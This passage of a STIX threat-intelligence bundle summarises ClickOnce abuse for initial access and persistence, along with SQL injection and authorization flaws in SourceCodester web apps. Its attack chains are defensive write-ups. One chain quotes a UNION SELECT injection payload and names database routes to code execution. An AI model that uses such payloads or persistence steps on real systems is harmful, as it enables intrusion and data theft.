      "name": "Abuse of ClickOnce Technology: Understanding Deployment Mechanics",
      "description": "## Overview\n\nCrowdStrike has published the first part of a two-part series detailing the internal workings and potential for abuse of Microsoft's ClickOnce technology. Introduced to simplify application deployment and updates, ClickOnce allows developers to distribute applications that users can run and install with minimal interaction and typically without elevated privileges. While this offers a streamlined experience for legitimate software, it also presents a significant opportunity for threat actors to distribute malware. This brief focuses on the technical aspects of ClickOnce, explaining its components like the `.application` manifest files, and the `dfsvc.exe` process responsible for its execution. The report explicitly states that Part 1 is about understanding the technology, while Part 2 will cover specific abuse cases. This implies a systemic risk from the technology's design rather than a specific vulnerability or ongoing campaign.\n\n## Attack Chain\n\nThis brief describes the legitimate functionality and internal mechanisms of ClickOnce technology rather than a specific observed attack chain. Therefore, no malicious attack chain steps are detailed here.\n\n## Impact\n\nThe inherent design of ClickOnce allows applications to be deployed with minimal user interaction and without requiring administrative privileges, which could significantly lower the barrier for threat actors to deploy malware. If abused, organizations could face widespread malware infections, data exfiltration, or system compromise as users unknowingly execute malicious ClickOnce applications. The user-friendly deployment process bypasses traditional security prompts for administrative access, making it a highly effective mechanism for social engineering and initial access. This could lead to a higher volume of successful initial compromises across various sectors.\n\n## Recommendation\n\n*   **Review and enforce application whitelisting policies**: Ensure that only trusted applications are allowed to execute, especially those deployed via ClickOnce, to prevent malicious `.application` files from running.\n*   **Enable comprehensive process creation logging**: Monitor for the execution of `dfsvc.exe` and its child processes, which are central to ClickOnce deployment, to identify unusual activity.\n*   **Monitor file creation/modification of `.application` and `.manifest` files**: Look for these files in unusual locations or being dropped by suspicious processes, as these are key components of ClickOnce deployment.\n*   **Educate users about the risks of unsolicited application installs**: Inform users about the dangers of clicking on \"install\" buttons from untrusted sources, even if they appear to be standard application deployment prompts.\n",
      "published": "2026-07-06T07:04:50Z",
      "labels": [
        "clickonce",
        "microsoft",
        "application-deployment",
        "abuse",
        "defense-evasion",
        "execution",
        "platform-abuse"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0e78d545-13e8-5d5c-9725-ca0ecfc033b8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ca708a60-a7fb-5ed4-aa4a-f6aad78a43e7",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--73ff7405-2489-5a38-89ac-fd46f3235dfc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ca708a60-a7fb-5ed4-aa4a-f6aad78a43e7",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1036",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aa044083-6528-5302-a98c-d660f1e18cdd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ca708a60-a7fb-5ed4-aa4a-f6aad78a43e7",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1547",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--43e716b0-2492-573d-afb0-15dd6b59bef4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ca708a60-a7fb-5ed4-aa4a-f6aad78a43e7",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1053",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3a6263dc-4437-56ac-acfe-a0d247b767da",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ca708a60-a7fb-5ed4-aa4a-f6aad78a43e7",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b09e0d77-aa83-5f28-836c-527dfcef9492",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ca708a60-a7fb-5ed4-aa4a-f6aad78a43e7",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ca708a60-a7fb-5ed4-aa4a-f6aad78a43e7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Threat Actors Abuse Microsoft ClickOnce for Initial Access and Persistence",
      "description": "## Overview\n\nThreat actors are increasingly exploiting Microsoft's ClickOnce technology as a versatile attack vector for initial access, execution, and persistence. This abuse is driven by several key factors: the user-friendly deployment process requires minimal interaction, often bypassing traditional email and endpoint security controls that heavily scrutinize `.exe` files. ClickOnce applications deploy without requiring elevated privileges, allowing adversaries to target standard user accounts. A significant advantage for attackers is the execution of malicious payloads within legitimate Microsoft process trees, specifically `rundll32.exe` and `dfsvc.exe`, increasing stealth and evading detection. Furthermore, the built-in update mechanism of ClickOnce allows attackers to maintain persistent access, update malware, modify Command and Control (C2) addresses, and facilitate lateral movement without needing further user interaction. The general lack of awareness around the security implications of ClickOnce apps among users and defenders further enhances the effectiveness of these attacks.\n\n## Attack Chain\n\n1.  **Initial Access**: Adversaries deliver a malicious ClickOnce application, typically via a web link or a standalone `.application` file, through social engineering tactics to a target user.\n2.  **User Execution**: The target user is convinced to click the web link or execute the `.application` file, initiating the ClickOnce deployment process.\n3.  **Deployment \u0026 Execution**: The ClickOnce application deploys, and its embedded malicious payload executes discreetly within legitimate Microsoft processes, such as `rundll32.exe` or `dfsvc.exe`.\n4.  **Persistence - Shortcut**: If configured for offline availability, a malicious `.appref-ms` shortcut file is dropped in the user's Start Menu directory (`%Users%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\`).\n5.  **Persistence - Startup/Scheduled Task**: The attacker leverages the dropped `.appref-ms` file by placing it in a Windows Startup folder or creating a scheduled task to automatically launch it.\n6.  **Command and Control (C2) via Updates**: The malicious ClickOnce application utilizes its inherent update mechanism to fetch new malicious components, change C2 server addresses, and facilitate lateral movement or other post-exploitation activities without requiring additional user prompting.\n\n## Impact\n\nThe abuse of ClickOnce allows threat actors to bypass common protection mechanisms, leading to successful initial access and prolonged persistence within victim environments. While no specific victim counts or sectors were provided, the technique's effectiveness against \"traditional defenses\" suggests a broad targeting potential across various industries. If successful, attackers can establish reliable remote access, covertly update their malware, alter C2 communications, and move laterally across networks, leading to data exfiltration, ransomware deployment, or other detrimental outcomes. The stealthy nature of execution within legitimate Microsoft processes further complicates detection and incident response efforts, potentially leading to extended dwell times.\n\n## Recommendation\n\n*   Enable Sysmon process creation (Event ID 1), file creation (Event ID 11), and scheduled task creation (Event ID 12/13/14) logging to detect the behaviors described in this brief.\n*   Deploy the \"Direct Execution of ClickOnce Application from User Directory\" Sigma rule to identify suspicious `dfsvc.exe` invocations.\n*   Implement the \"Creation of .appref-ms in User Startup Directories\" Sigma rule to detect malicious persistence attempts via ClickOnce shortcut files.\n*   Utilize the \"Scheduled Task Creation for .appref-ms File\" Sigma rule to identify scheduled persistence targeting ClickOnce applications.\n*   Educate users on the risks associated with clicking suspicious links or executing `.application` files from untrusted sources, emphasizing that legitimate software installations typically involve more prominent prompts.\n",
      "published": "2026-07-07T18:46:25Z",
      "labels": [
        "clickonce",
        "persistence",
        "initial-access",
        "defense-evasion",
        "windows",
        "microsoft-technology"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-two/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--16e05039-4b77-59ef-a7a4-6c397c94257a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ad285059-78ce-5850-b1f2-152254ebd6ae",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ad285059-78ce-5850-b1f2-152254ebd6ae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of the ClickOnce Technology, Part 1: The Inner Workings of ClickOnce Application Deployment",
      "description": "## Overview\n\nMicrosoft's ClickOnce technology, designed to simplify application deployment and updates for developers, is being increasingly abused by threat actors. This initial installment of a two-part series by CrowdStrike provides a deep dive into the internal mechanisms of ClickOnce, explaining how applications are published, deployed, and updated. Its key features, such as minimal user interaction, the absence of elevated privileges for installation, and self-contained packaging, make it an attractive vector for malicious purposes. Understanding these legitimate functionalities is crucial for defenders, as Part 2 will detail specific weaponization methods and provide detection strategies against the exploitation of this technology, which allows adversaries to deliver malware with ease.\n\n## Impact\n\nWhile this brief focuses on the technical underpinnings rather than specific observed attacks, the potential impact of ClickOnce abuse is significant. By leveraging ClickOnce, threat actors can bypass traditional security controls that might flag installers requiring elevated privileges, tricking users into deploying malicious applications with \"one click.\" This can lead to the execution of arbitrary code, malware installation, data exfiltration, and compromise of user endpoints. The inherent trust users might place in what appears to be a legitimate application deployment process, coupled with ClickOnce's design to simplify installation, creates a fertile ground for successful social engineering and malware delivery.\n\n## Recommendation\n\nThis brief serves as foundational knowledge for understanding potential ClickOnce abuse. Prepare your detection engineering teams by reviewing the provided TTPs, specifically attack.t1204.002, and anticipate the types of malicious behaviors that will be detailed in subsequent analyses. Focus on user education around unsolicited application installations and integrate robust endpoint detection and response (EDR) solutions that can monitor for the execution of unsigned or suspicious ClickOnce applications, even if they don't require administrative privileges.\n",
      "published": "2026-07-06T04:56:30Z",
      "labels": [
        "clickonce",
        "microsoft",
        "application-deployment",
        "windows-feature",
        "abuse-potential",
        "malware-delivery"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--21336c35-d3ca-509c-9862-53d3b1ebb81b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14778: Improper Authorization in SourceCodester Onlne Examination \u0026 Learning Management System",
      "description": "## Overview\n\nThe National Vulnerability Database (NVD) has published a high-severity vulnerability, CVE-2026-14778, affecting SourceCodester Onlne Examination \u0026 Learning Management System version 1.0. This flaw resides in an unspecified part of the `/ajax_enroll.php` component, specifically within the Enrollment Management functionality. Attackers can exploit this by manipulating the `student_id`, `schedule_id`, or `action` arguments, which leads to improper authorization. This allows remote attackers to bypass intended access controls and perform unauthorized actions within the system. The vulnerability has been publicly disclosed, increasing the risk of widespread exploitation. Defenders should prioritize patching and monitoring for exploitation attempts, as unauthorized access could lead to significant data breaches or system compromise.\n\n## Attack Chain\n\n1.  **Initial Access / Reconnaissance**: An unauthenticated remote attacker identifies a SourceCodester Onlne Examination \u0026 Learning Management System 1.0 instance, potentially by scanning for known web application paths.\n2.  **Vulnerability Identification**: The attacker targets the `/ajax_enroll.php` endpoint, recognizing its role in enrollment management.\n3.  **Parameter Manipulation**: The attacker crafts HTTP POST or GET requests to `/ajax_enroll.php`, specifically manipulating the `student_id`, `schedule_id`, or `action` parameters with unexpected or malicious values.\n4.  **Authorization Bypass**: The vulnerable system processes these manipulated parameters without adequate authorization checks, failing to properly validate the attacker's permissions or the legitimacy of the request.\n5.  **Unauthorized Action**: Due to the improper authorization, the system executes the requested action as if the attacker possessed legitimate privileges (e.g., enrolling a student, modifying a schedule, or other administrative functions).\n6.  **Impact on System Integrity/Confidentiality**: The attacker successfully gains unauthorized access to sensitive functionalities or data, leading to data modification, unauthorized data exposure, or full system compromise.\n\n## Impact\n\nThe successful exploitation of CVE-2026-14778 could lead to significant unauthorized access and data integrity issues. Attackers could enroll or unenroll students, modify examination schedules, or alter learning materials without legitimate credentials. This could disrupt educational operations, compromise the integrity of academic records, or expose sensitive student and course data. While no specific victim count or targeted sectors are currently identified, any organization using SourceCodester Onlne Examination \u0026 Learning Management System 1.0 is at risk.\n\n## Recommendation\n\n1.  Apply any available patches or vendor advisories immediately for SourceCodester Onlne Examination \u0026 Learning Management System 1.0 to address CVE-2026-14778.\n2.  Enable comprehensive webserver access logging to monitor for suspicious requests to `/ajax_enroll.php` that manipulate parameters related to `student_id`, `schedule_id`, or `action`.\n3.  Implement Web Application Firewall (WAF) rules to detect and block anomalous requests targeting the `student_id`, `schedule_id`, or `action` parameters within requests to `/ajax_enroll.php`.\n",
      "published": "2026-07-06T00:22:41Z",
      "labels": [
        "web-vulnerability",
        "improper-authorization",
        "cve"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14778"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e38a593e-722c-522d-af38-f3c639002a54",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/orionyan520/cve_report/issues/2",
      "pattern": "[url:value = 'https://github.com/orionyan520/cve_report/issues/2']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T22:21:20Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--99f93903-e618-5c86-856e-1d58b32a0c05",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--eb0f63ca-8ac5-5e0c-8f60-c54631e10d78",
      "target_ref": "indicator--e38a593e-722c-522d-af38-f3c639002a54"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--420ed003-bf5b-5419-9cc3-63b36cedc126",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/cve/CVE-2026-14771",
      "pattern": "[url:value = 'https://vuldb.com/cve/CVE-2026-14771']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T22:21:20Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5be6d8f3-16a5-5c2e-8bf8-7a2df35acf0c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--eb0f63ca-8ac5-5e0c-8f60-c54631e10d78",
      "target_ref": "indicator--420ed003-bf5b-5419-9cc3-63b36cedc126"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--46507285-e1dd-5f00-b16e-e56d26115c48",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/submit/849107",
      "pattern": "[url:value = 'https://vuldb.com/submit/849107']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T22:21:20Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--178b0d26-191f-589d-8f3e-c217ef0c54fa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--eb0f63ca-8ac5-5e0c-8f60-c54631e10d78",
      "target_ref": "indicator--46507285-e1dd-5f00-b16e-e56d26115c48"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--26c53a81-3c31-56a0-8756-9625df11c8d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376361",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376361']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T22:21:20Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dd01dc13-fce3-50b1-8ad7-204cb5a2341a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--eb0f63ca-8ac5-5e0c-8f60-c54631e10d78",
      "target_ref": "indicator--26c53a81-3c31-56a0-8756-9625df11c8d6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2c571edc-1606-5b0f-8f07-728c2848b5a0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376361/cti",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376361/cti']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T22:21:20Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bd8f5762-484e-5477-937c-28965a2b7d3e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--eb0f63ca-8ac5-5e0c-8f60-c54631e10d78",
      "target_ref": "indicator--2c571edc-1606-5b0f-8f07-728c2848b5a0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5e129266-9ae2-53c0-a55b-21b6438ec25f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.sourcecodester.com/",
      "pattern": "[url:value = 'https://www.sourcecodester.com/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T22:21:20Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--04aecf8c-791d-5d6f-a797-268dfc99d33f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--eb0f63ca-8ac5-5e0c-8f60-c54631e10d78",
      "target_ref": "indicator--5e129266-9ae2-53c0-a55b-21b6438ec25f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b54eef94-7732-52e7-a5e7-74fc558dc3dc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--eb0f63ca-8ac5-5e0c-8f60-c54631e10d78",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--eb0f63ca-8ac5-5e0c-8f60-c54631e10d78",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14771: SourceCodester Class and Exam Timetabling System SQL Injection Vulnerability",
      "description": "## Overview\n\nA high-severity SQL injection vulnerability, identified as CVE-2026-14771, affects SourceCodester Class and Exam Timetabling System version 1.0. The flaw resides within an unknown function of the `/edit_exam1.php` file, specifically when processing the `ID` argument. This vulnerability allows a remote, unauthenticated attacker to inject malicious SQL queries by manipulating the `ID` parameter. The exploitation of this vulnerability can lead to unauthorized access to sensitive data, data manipulation, and potentially remote code execution on the underlying database server, severely compromising the system's confidentiality, integrity, and availability. An exploit for CVE-2026-14771 has been publicly published, significantly increasing the risk of widespread exploitation against vulnerable instances of the system. Defenders should prioritize patching and implementing robust web application security measures.\n\n## Attack Chain\n\n1.  A remote, unauthenticated attacker identifies a vulnerable SourceCodester Class and Exam Timetabling System 1.0 instance, often exposed to the internet.\n2.  The attacker crafts a malicious HTTP POST request targeting the `/edit_exam1.php` endpoint.\n3.  The request includes a specially formulated SQL injection payload within the `ID` argument, designed to bypass input sanitization.\n4.  The vulnerable web application processes the unsanitized `ID` argument, causing the embedded malicious SQL query to be executed by the backend database.\n5.  Depending on the payload, the attacker can achieve information disclosure (e.g., extracting user credentials, sensitive system data), data manipulation (e.g., altering schedules, grades), or potentially escalate privileges.\n6.  In certain database configurations (e.g., `xp_cmdshell` on MSSQL or `sys_exec` on MySQL), the attacker might achieve remote code execution on the server hosting the database.\n7.  The successful exploitation leads to compromise of application data, system control, and potential further lateral movement within the network.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14771 allows attackers to gain unauthorized control over the application's backend database. This can result in significant data breaches, including exposure of student and faculty information, exam schedules, and administrative credentials. The integrity of timetables and exam records could be compromised, leading to operational disruption and reputational damage for educational institutions using the system. With a CVSS v3.1 base score of 7.3 (High), the vulnerability poses a substantial risk, especially given that a public exploit exists, increasing the likelihood of widespread, opportunistic attacks by various threat actors.\n\n## Recommendation\n\n*   Immediately apply patches or vendor-provided updates for SourceCodester Class and Exam Timetabling System 1.0 to address CVE-2026-14771.\n*   Deploy the provided Sigma rule to your SIEM to detect attempts at exploiting CVE-2026-14771.\n*   Implement or update Web Application Firewall (WAF) rules to detect and block common SQL injection patterns, especially targeting the `/edit_exam1.php` endpoint and `ID` parameter.\n*   Review web server logs for suspicious HTTP requests containing SQL injection payloads, as indicated in the provided Sigma rule.\n",
      "published": "2026-07-05T22:21:20Z",
      "labels": [
        "sql-injection",
        "web-application",
        "vulnerability",
        "remote-code-execution",
        "data-exfiltration"
      ],
      "object_refs": [
        "indicator--e38a593e-722c-522d-af38-f3c639002a54",
        "indicator--420ed003-bf5b-5419-9cc3-63b36cedc126",
        "indicator--46507285-e1dd-5f00-b16e-e56d26115c48",
        "indicator--26c53a81-3c31-56a0-8756-9625df11c8d6",
        "indicator--2c571edc-1606-5b0f-8f07-728c2848b5a0",
        "indicator--5e129266-9ae2-53c0-a55b-21b6438ec25f",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14771"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/orionyan520/cve_report/issues/2"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14771"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/849107"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376361"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376361/cti"
        },
        {
          "source_name": "reference",
          "url": "https://www.sourcecodester.com/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2249f802-e713-5c19-ac0a-ea06440ff7fe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--eadad2ca-e217-5677-84a4-a681e7d4b53d",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--eadad2ca-e217-5677-84a4-a681e7d4b53d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14770: SourceCodester Class and Exam Timetabling System SQL Injection Vulnerability",
      "description": "## Overview\n\nA critical SQL injection vulnerability, tracked as CVE-2026-14770, has been publicly disclosed and affects SourceCodester Class and Exam Timetabling System version 1.0. This flaw resides in the `/edit_room.php` endpoint where improper neutralization of special elements in the 'ID' argument allows for remote code execution. Attackers can manipulate this parameter to inject malicious SQL queries into the application's backend database. This vulnerability is remotely exploitable without authentication, meaning threat actors can target vulnerable instances directly over the network. Crucially, the exploit code for this vulnerability is now public, significantly increasing the risk of widespread exploitation by various threat actors. Defenders must prioritize patching or mitigating this vulnerability immediately to prevent unauthorized access to sensitive data and potential system compromise.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a vulnerable instance of SourceCodester Class and Exam Timetabling System 1.0, typically by scanning for known application signatures or default paths.\n2.  The attacker crafts a specially designed HTTP GET request targeting the `/edit_room.php` endpoint on the vulnerable system.\n3.  Within the HTTP request, the `ID` parameter is modified to include SQL injection payloads (e.g., `id=1 UNION SELECT USER(), DATABASE(), VERSION() --`).\n4.  The vulnerable application processes the malicious `ID` parameter, which results in the backend database executing the injected SQL query.\n5.  The database's response, now containing the results of the attacker's query, is returned within the legitimate HTTP response, inadvertently disclosing sensitive information (e.g., database username, current database name, system version).\n6.  The attacker parses the HTTP response to extract the sensitive data.\n7.  The attacker continues to refine payloads, potentially pivoting to other SQL injection techniques like time-based blind SQLi, out-of-band SQLi, or error-based SQLi to fully enumerate and exfiltrate database contents.\n8.  Depending on database permissions and configuration, the attacker might achieve remote code execution via database functionalities (e.g., `xp_cmdshell` on MSSQL, `LOAD_FILE`/`INTO OUTFILE` on MySQL) to establish persistence or further compromise the underlying server.\n\n## Impact\n\nA successful exploitation of CVE-2026-14770 leads to significant impact on the confidentiality, integrity, and availability of data stored within the application's database. Attackers can exfiltrate sensitive information, such as user credentials, student records, timetable details, and other proprietary data. The integrity of the application's data can be compromised through unauthorized modification or deletion of records. In scenarios where the database user has elevated privileges or the database system allows for file operations or command execution, attackers could potentially escalate their access to the underlying server, leading to a complete system compromise, ransomware deployment, or further network lateral movement. Given the public availability of exploit code, a wide range of organizations using this system are at high risk of immediate targeting.\n\n## Recommendation\n\n*   Prioritize patching SourceCodester Class and Exam Timetabling System to a version that remediates CVE-2026-14770 as soon as it becomes available.\n*   Deploy the Sigma rule provided in this brief to your SIEM/detection platform to identify and alert on attempted exploitation of CVE-2026-14770.\n*   Implement Web Application Firewalls (WAFs) with rules specifically designed to 